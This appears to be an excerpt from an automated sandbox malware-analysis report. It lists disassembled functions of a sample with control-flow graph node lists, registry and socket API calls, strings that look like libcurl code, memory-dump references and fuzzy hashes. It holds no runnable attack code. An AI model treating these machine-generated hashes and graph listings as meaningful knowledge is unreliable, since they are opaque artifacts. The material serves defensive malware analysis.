                                                              • Local port: %hu, xrefs: 007FAF28
                                                              • Bind to local port %d failed, trying next, xrefs: 007FAFE5
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 007FADAC
                                                              • Could not set TCP_NODELAY: %s, xrefs: 007FA871
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: a1b5e097d54da78ae9fe8acd757ac8c94784d9fc9342b570b068edc5d951ea3a
                                                              • Instruction ID: 3fed9be191a33949b9da7846c8db5165fae10c3782fd5e9be2cbb044bae6c553
                                                              • Opcode Fuzzy Hash: a1b5e097d54da78ae9fe8acd757ac8c94784d9fc9342b570b068edc5d951ea3a
                                                              • Instruction Fuzzy Hash: 1662F4B1508345ABE7208F14C846BBBB7E5BF94314F044929FA8C97392E775E845CBA3
                                                              Function 00889740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 862 889740-88975b 863 88975d-889768 call 8878a0 862->863 864 889780-889782 862->864 873 8899bb-8899c0 863->873 874 88976e-889770 863->874 866 889788-8897a0 call b48e00 call 8878a0 864->866 867 889914-88994e call b48b70 RegOpenKeyExA 864->867 866->873 880 8897a6-8897c5 866->880 877 88995a-889992 RegQueryValueExA RegCloseKey call b48b98 867->877 878 889950-889955 867->878 875 889a0c-889a15 873->875 879 889772-88977e 874->879 874->880 892 889997-8899b5 call 8878a0 877->892 878->875 879->866 885 889827-889833 880->885 886 8897c7-8897e0 880->886 888 88985f-889872 call 885ca0 885->888 889 889835-88985c call 87e2b0 * 2 885->889 890 8897e2-8897f3 call b48b50 886->890 891 8897f6-889809 886->891 903 889878-88987d call 8877b0 888->903 904 8899f0 888->904 889->888 890->891 891->885 902 88980b-889810 891->902 892->873 892->880 902->885 908 889812-889822 902->908 909 889882-889889 903->909 907 8899f5-8899fb call 885d00 904->907 917 8899fe-889a09 907->917 908->875 909->907 913 88988f-88989b call 874fe0 909->913 913->904 920 8898a1-8898c3 call b48b50 call 8878a0 913->920 917->875 926 8898c9-8898db call 87e2d0 920->926 927 8899c2-8899ed call 87e2b0 * 2 920->927 926->927 932 8898e1-8898f0 call 87e2d0 926->932 927->904 932->927 937 8898f6-889905 call 8863f0 932->937 942 88990b-88990f 937->942 943 889f66-889f7f call 885d00 937->943 945 889a3f-889a5a call 886740 call 8863f0 942->945 943->917 945->943 951 889a60-889a6e call 886d60 945->951 954 889a1f-889a39 call 886840 call 8863f0 951->954 955 889a70-889a94 call 886200 call 8867e0 call 886320 951->955 954->943 954->945 966 889a16-889a19 955->966 967 889a96-889ac6 call 87d120 955->967 966->954 968 889fc1 966->968 973 889ac8-889adb call 87d120 967->973 974 889ae1-889af7 call 87d190 967->974 970 889fc5-889ffd call 885d00 call 87e2b0 * 2 968->970 970->917 973->954 973->974 974->954 981 889afd-889b09 call 874fe0 974->981 981->968 986 889b0f-889b29 call 87e730 981->986 991 889b2f-889b3a call 8878a0 986->991 992 889f84-889f88 986->992 991->992 999 889b40-889b54 call 87e760 991->999 994 889f95-889f99 992->994 996 889f9b-889f9e 994->996 997 889fa0-889fb6 call 87ebf0 * 2 994->997 996->968 996->997 1009 889fb7-889fbe 997->1009 1005 889f8a-889f92 999->1005 1006 889b5a-889b6e call 87e730 999->1006 1005->994 1012 889b8c-889b97 call 8863f0 1006->1012 1013 889b70-88a004 1006->1013 1009->968 1021 889c9a-889cab call 87ea00 1012->1021 1022 889b9d-889bbf call 886740 call 8863f0 1012->1022 1018 88a015-88a01d 1013->1018 1019 88a01f-88a022 1018->1019 1020 88a024-88a045 call 87ebf0 * 2 1018->1020 1019->970 1019->1020 1020->970 1031 889f31-889f35 1021->1031 1032 889cb1-889ccd call 87ea00 call 87e960 1021->1032 1022->1021 1040 889bc5-889bda call 886d60 1022->1040 1034 889f40-889f61 call 87ebf0 * 2 1031->1034 1035 889f37-889f3a 1031->1035 1048 889cfd-889d0e call 87e960 1032->1048 1049 889ccf 1032->1049 1034->954 1035->954 1035->1034 1040->1021 1051 889be0-889bf4 call 886200 call 8867e0 1040->1051 1061 889d10 1048->1061 1062 889d53-889d55 1048->1062 1052 889cd1-889cec call 87e9f0 call 87e4a0 1049->1052 1051->1021 1068 889bfa-889c0b call 886320 1051->1068 1073 889cee-889cfb call 87e9d0 1052->1073 1074 889d47-889d51 1052->1074 1063 889d12-889d2d call 87e9f0 call 87e4a0 1061->1063 1066 889e69-889e8e call 87ea40 call 87e440 1062->1066 1089 889d5a-889d6f call 87e960 1063->1089 1090 889d2f-889d3c call 87e9d0 1063->1090 1092 889e90-889e92 1066->1092 1093 889e94-889eaa call 87e3c0 1066->1093 1082 889c11-889c1c call 887b70 1068->1082 1083 889b75-889b86 call 87ea00 1068->1083 1073->1048 1073->1052 1079 889dca-889ddb call 87e960 1074->1079 1096 889ddd-889ddf 1079->1096 1097 889e2e-889e36 1079->1097 1082->1012 1109 889c22-889c33 call 87e960 1082->1109 1083->1012 1104 889f2d 1083->1104 1119 889d71-889d73 1089->1119 1120 889dc2 1089->1120 1090->1063 1116 889d3e-889d42 1090->1116 1094 889eb3-889ec4 call 87e9c0 1092->1094 1113 88a04a-88a04c 1093->1113 1114 889eb0-889eb1 1093->1114 1094->954 1122 889eca-889ed0 1094->1122 1105 889e06-889e21 call 87e9f0 call 87e4a0 1096->1105 1102 889e38-889e3b 1097->1102 1103 889e3d-889e5b call 87ebf0 * 2 1097->1103 1102->1103 1111 889e5e-889e67 1102->1111 1103->1111 1104->1031 1145 889de1-889dee call 87ec80 1105->1145 1146 889e23-889e2c call 87eac0 1105->1146 1132 889c35 1109->1132 1133 889c66-889c75 call 8878a0 1109->1133 1111->1066 1111->1094 1125 88a04e-88a051 1113->1125 1126 88a057-88a070 call 87ebf0 * 2 1113->1126 1114->1094 1116->1066 1127 889d9a-889db5 call 87e9f0 call 87e4a0 1119->1127 1120->1079 1130 889ee5-889ef2 call 87e9f0 1122->1130 1125->968 1125->1126 1126->1009 1160 889d75-889d82 call 87ec80 1127->1160 1161 889db7-889dc0 call 87eac0 1127->1161 1130->954 1155 889ef8-889f0e call 87e440 1130->1155 1140 889c37-889c51 call 87e9f0 1132->1140 1151 889c7b-889c8f call 87e7c0 1133->1151 1152 88a011 1133->1152 1140->1012 1173 889c57-889c64 call 87e9d0 1140->1173 1166 889df1-889e04 call 87e960 1145->1166 1146->1166 1151->1012 1175 889c95-88a00e 1151->1175 1152->1018 1171 889f10-889f26 call 87e3c0 1155->1171 1172 889ed2-889edf call 87e9e0 1155->1172 1177 889d85-889d98 call 87e960 1160->1177 1161->1177 1166->1097 1166->1105 1171->1172 1188 889f28 1171->1188 1172->954 1172->1130 1173->1133 1173->1140 1175->1152 1177->1120 1177->1127 1188->968
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00889946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00889974
                                                              • RegCloseKey.KERNELBASE(?), ref: 0088998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100
                                                              • Opcode ID: b5e83a7e8110e48cb16d9b3ef56bf6773f1f440e6bf0491beecb543dfb879bd0
                                                              • Instruction ID: 770118cd7ead4491be8d582719f6228dfbc8ac4acd30f6a9ad8ebce3cee67cc6
                                                              • Opcode Fuzzy Hash: b5e83a7e8110e48cb16d9b3ef56bf6773f1f440e6bf0491beecb543dfb879bd0
                                                              • Instruction Fuzzy Hash: 3E3263B5904201ABEB11BB29EC42A2B76E5FF54318F084474F98DD6263FB31E924D793
                                                              Function 007F8B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1302 7f8b50-7f8b69 1303 7f8b6b-7f8b74 1302->1303 1304 7f8be6 1302->1304 1306 7f8beb-7f8bf2 1303->1306 1307 7f8b76-7f8b8d 1303->1307 1305 7f8be9 1304->1305 1305->1306 1308 7f8b8f-7f8ba7 call 7d6e40 1307->1308 1309 7f8bf3-7f8bfe call 7fa550 1307->1309 1314 7f8bad-7f8baf 1308->1314 1315 7f8cd9-7f8d16 SleepEx getsockopt 1308->1315 1316 7f8de4-7f8def 1309->1316 1317 7f8c04-7f8c08 1309->1317 1318 7f8ca6-7f8cb0 1314->1318 1319 7f8bb5-7f8bb9 1314->1319 1320 7f8d18-7f8d20 1315->1320 1321 7f8d22 1315->1321 1322 7f8e8c-7f8e95 1316->1322 1323 7f8df5-7f8e19 call 7fa150 1316->1323 1324 7f8c0e-7f8c1d 1317->1324 1325 7f8dbd-7f8dc3 1317->1325 1318->1315 1329 7f8cb2-7f8cb8 1318->1329 1319->1306 1330 7f8bbb-7f8bc2 1319->1330 1331 7f8d26-7f8d39 1320->1331 1321->1331 1332 7f8e97-7f8e9c 1322->1332 1333 7f8f00-7f8f06 1322->1333 1358 7f8e1b-7f8e26 1323->1358 1359 7f8e88 1323->1359 1327 7f8c1f-7f8c30 connect 1324->1327 1328 7f8c35-7f8c48 call 7fa150 1324->1328 1325->1305 1327->1328 1360 7f8c4d-7f8c4f 1328->1360 1335 7f8cbe-7f8cd4 call 7fb180 1329->1335 1336 7f8ddc-7f8dde 1329->1336 1330->1306 1337 7f8bc4-7f8bcc 1330->1337 1339 7f8d3b-7f8d3d 1331->1339 1340 7f8d43-7f8d61 call 7dd8c0 call 7fa150 1331->1340 1341 7f8edf-7f8eef call 7c78b0 1332->1341 1342 7f8e9e-7f8eb6 call 7d2a00 1332->1342 1333->1306 1335->1316 1336->1305 1336->1316 1345 7f8bce-7f8bd2 1337->1345 1346 7f8bd4-7f8bda 1337->1346 1339->1336 1339->1340 1364 7f8d66-7f8d74 1340->1364 1362 7f8ef2-7f8efc 1341->1362 1342->1341 1357 7f8eb8-7f8edd call 7d3410 * 2 1342->1357 1345->1306 1345->1346 1346->1306 1354 7f8bdc-7f8be1 1346->1354 1361 7f8dac-7f8db8 call 8050a0 1354->1361 1357->1362 1366 7f8e2e-7f8e85 call 7dd090 call 804fd0 1358->1366 1367 7f8e28-7f8e2c 1358->1367 1359->1322 1368 7f8c8e-7f8c93 1360->1368 1369 7f8c51-7f8c58 1360->1369 1361->1306 1362->1333 1364->1306 1371 7f8d7a-7f8d81 1364->1371 1366->1359 1367->1359 1367->1366 1376 7f8c99-7f8c9f 1368->1376 1377 7f8dc8-7f8dd9 call 7fb100 1368->1377 1369->1368 1374 7f8c5a-7f8c62 1369->1374 1371->1306 1378 7f8d87-7f8d8f 1371->1378 1380 7f8c6a-7f8c70 1374->1380 1381 7f8c64-7f8c68 1374->1381 1376->1318 1377->1336 1383 7f8d9b-7f8da1 1378->1383 1384 7f8d91-7f8d95 1378->1384 1380->1368 1387 7f8c72-7f8c8b call 8050a0 1380->1387 1381->1368 1381->1380 1383->1306 1389 7f8da7 1383->1389 1384->1306 1384->1383 1387->1368 1389->1361
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 007F8C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 007F8CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 007F8D0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: 53f5d23c6d7d3886b3fa4b2f98e3ad1fae786dda63bac181a34f4944d3cd3a80
                                                              • Instruction ID: f1bfecfe7ed1143f7b97306a3fb2222cb6f9946c2163b0f3b0b559a4e4c0482a
                                                              • Opcode Fuzzy Hash: 53f5d23c6d7d3886b3fa4b2f98e3ad1fae786dda63bac181a34f4944d3cd3a80
                                                              • Instruction Fuzzy Hash: 64B1B0B060430AAFDB50CF24C985BB6B7E0AF45314F148929EA594B3D2DB79EC45C763
                                                              Function 007C2F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1488 7c2f17-7c2f8c call c40df0 call c411e0 1493 7c31c9-7c31cd 1488->1493 1494 7c2f91-7c2ff4 call 7c1619 RegOpenKeyExA 1493->1494 1495 7c31d3-7c31d6 1493->1495 1498 7c2ffa-7c300b 1494->1498 1499 7c31c5 1494->1499 1500 7c315c-7c31ac RegEnumKeyExA 1498->1500 1499->1493 1501 7c3010-7c3083 call 7c1619 RegOpenKeyExA 1500->1501 1502 7c31b2-7c31c2 1500->1502 1506 7c314e-7c3152 1501->1506 1507 7c3089-7c30d4 RegQueryValueExA 1501->1507 1502->1499 1506->1500 1508 7c313b-7c314b RegCloseKey 1507->1508 1509 7c30d6-7c3137 call c410c0 call c41150 call c411e0 call c40ff0 call c411e0 call c3f560 1507->1509 1508->1506 1509->1508
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: 2f70b84d610cc517d89a22bd3a3ba3c6719bb311b5936b412e775989d885ab61
                                                              • Instruction ID: c9dde92f6bd9cd3c9cf421cd1172114c9aafea58694b7c7e6dd2142ed470b113
                                                              • Opcode Fuzzy Hash: 2f70b84d610cc517d89a22bd3a3ba3c6719bb311b5936b412e775989d885ab61
                                                              • Instruction Fuzzy Hash: 5F71A3B49043199FDB10EF69C98479EBBF0FF85308F10885DE99897301E7749A899F92
                                                              Function 007C76A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1522 7c76a0-7c76be 1523 7c76e6-7c76f2 send 1522->1523 1524 7c76c0-7c76c7 1522->1524 1526 7c775e-7c7762 1523->1526 1527 7c76f4-7c7709 call 7c72a0 1523->1527 1524->1523 1525 7c76c9-7c76d1 1524->1525 1528 7c770b-7c7759 call 7c72a0 call 7ccb20 call b48c50 1525->1528 1529 7c76d3-7c76e4 1525->1529 1527->1526 1528->1526 1529->1527
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,N=|,00000000,?,?,007D07BF), ref: 007C76EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$N=|$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-873368536
                                                              • Opcode ID: 0985199f572590fe3a7b6d23516f1d1f0f3a982703a299d8d66c087eb570cc1e
                                                              • Instruction ID: 71eb04edd8ea62f6266dc4c85cce08a54b2ea8dda25a94e9c4e1a7550c76e5b1
                                                              • Opcode Fuzzy Hash: 0985199f572590fe3a7b6d23516f1d1f0f3a982703a299d8d66c087eb570cc1e
                                                              • Instruction Fuzzy Hash: 29113DB164D3047FD5109B159C49F3B7B5DDBC2B28F44090CFC0823242D9659D05C6F1
                                                              Function 007F9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1641 7f9290-7f92ed call 7c76a0 1644 7f93c3-7f93ce 1641->1644 1645 7f92f3-7f92fb 1641->1645 1652 7f93e5-7f9427 call 7dd090 call 804f40 1644->1652 1653 7f93d0-7f93e1 1644->1653 1646 7f93aa-7f93af 1645->1646 1647 7f9301-7f9333 call 7dd8c0 call 7dd9a0 1645->1647 1650 7f9456-7f9470 1646->1650 1651 7f93b5-7f93bc 1646->1651 1665 7f93a7 1647->1665 1666 7f9335-7f9364 WSAIoctl 1647->1666 1655 7f93be 1651->1655 1656 7f9429-7f9431 1651->1656 1652->1650 1652->1656 1653->1651 1657 7f93e3 1653->1657 1655->1650 1660 7f9439-7f943f 1656->1660 1661 7f9433-7f9437 1656->1661 1657->1650 1660->1650 1664 7f9441-7f9453 call 8050a0 1660->1664 1661->1650 1661->1660 1664->1650 1665->1646 1669 7f939b-7f93a4 1666->1669 1670 7f9366-7f936f 1666->1670 1669->1665 1670->1669 1673 7f9371-7f9390 setsockopt 1670->1673 1673->1669 1674 7f9392-7f9395 1673->1674 1674->1669
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 007F935D
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 007F9389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
